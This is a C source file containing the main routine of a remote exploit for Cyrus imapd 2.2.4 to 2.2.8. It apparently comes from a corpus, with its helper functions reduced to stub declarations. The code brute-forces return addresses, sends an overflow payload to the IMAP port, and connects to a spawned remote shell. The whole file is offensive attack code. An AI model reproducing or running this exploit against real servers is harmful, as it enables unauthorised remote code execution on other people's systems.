
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct sockaddr_in {int dummy; } ;
typedef int fd_set ;
struct TYPE_2__ {char* platform; int retloc; } ;


 int RET_BF_END ;
 int RET_BF_START ;
 char* SHELL_PORT ;
 int atoi (char*) ;
 int close (int) ;
 int conn (struct sockaddr_in,int) ;
 int gen_payload (char*,int,int,int) ;
 int get_shell (struct sockaddr_in,int,int) ;
 int getopt (int,char**,char*) ;
 char* malloc (int) ;
 char* optarg ;
 int printf (char*,...) ;
 int resolv (struct sockaddr_in*,char*) ;
 int sockprintf (int,char*,char*) ;
 int status (int,int,int) ;
 int strtoul (char*,int *,int ) ;
 TYPE_1__* targets ;
 int usage (char*) ;
 int vulnchck (struct sockaddr_in,int) ;

int main(int argc, char **argv){
    char *payload = ((void*)0), *hostn = ((void*)0), buffer[1024], *ptr;
    int i, first, sock, opt, target = 0, port = 143,
        shell_port = atoi(SHELL_PORT), sleeps = 1,
        p_size=10000, ret_bf_start = RET_BF_START,
        ret_bf_end = RET_BF_END, vulncheck = 1;
    fd_set fds;
 struct sockaddr_in addr;

    printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n");

    if (argc < 2)
        usage(argv[0]);

    while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){
        switch (opt){
         case 'h':
             hostn = optarg;
             break;
         case 'p':
                port = atoi(optarg);
                if(port > 65535 || port < 1){
                    printf("[-] Port %d is invalid\n",port);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?\n");
                    usage(argv[0]);
                }
                break;
            case 'S':
                ret_bf_start = strtoul(optarg,((void*)0),0);
                if(!ret_bf_start){
                    printf("[-] Wtf thats not a valid bruteforce start address!\n");
                    usage(argv[0]);
                }
                break;
            case 'E':
                ret_bf_end = strtoul(optarg,((void*)0),0);
                if(!ret_bf_end){
                    printf("[-] Wtf thats not a valid bruteforce end address!\n");
                    usage(argv[0]);
                }
                break;
            case 's':
                sleeps = atoi(optarg);
                break;
            case 'P':
                p_size = atoi(optarg);
                if(p_size < 1000){
                    printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n");
                    return 1;
                }
                break;
            case 'v':
                vulncheck = 2;
                break;
            case 'V':
                vulncheck = 0;
                break;
         default:
                usage(argv[0]);
        }
    }

    if(hostn == ((void*)0))
        usage(argv[0]);

    if(payload == ((void*)0)){
        if(!(payload = malloc(p_size))){
            printf("[-] Wasnt able to allocate space for the payload!\n");
            return 1;
        }
    }

    resolv(&addr, hostn);

    if(vulncheck == 2){
        vulnchck(addr, port);
        return 1;
    }
    else if(vulncheck == 1)
        vulnchck(addr, port);

    if(target != 1337){
        ret_bf_start = targets[target].retloc;
        ret_bf_end = targets[target].retloc+5;
        printf ("[!] Targeting %s\n", targets[target].platform);
    } else
        printf("[!] Starting bruteforce attack!\n");

    for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
        if((sock = conn(addr, port)) == -1){
            if(first != 1)
                printf("\n");
            printf("[-] Connecting failed!\n");
            break;
        }
        if(i == 4)
            ret_bf_start += (p_size - (p_size/10));
        else
            ret_bf_start++;
        gen_payload(payload, p_size, ret_bf_start, 1);
        status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)),
                ret_bf_start + (p_size - (p_size/10/2)));
        sockprintf(sock, "%s\r\n", payload);
        if(i == 4){
            get_shell(addr, shell_port, sleeps);
            i = 0;
        }
        if(ret_bf_start >= ret_bf_end)
            printf("[-]\n");
        close(sock);
    }
    printf("[-] Exploit failed!\n");
    return 1;
}
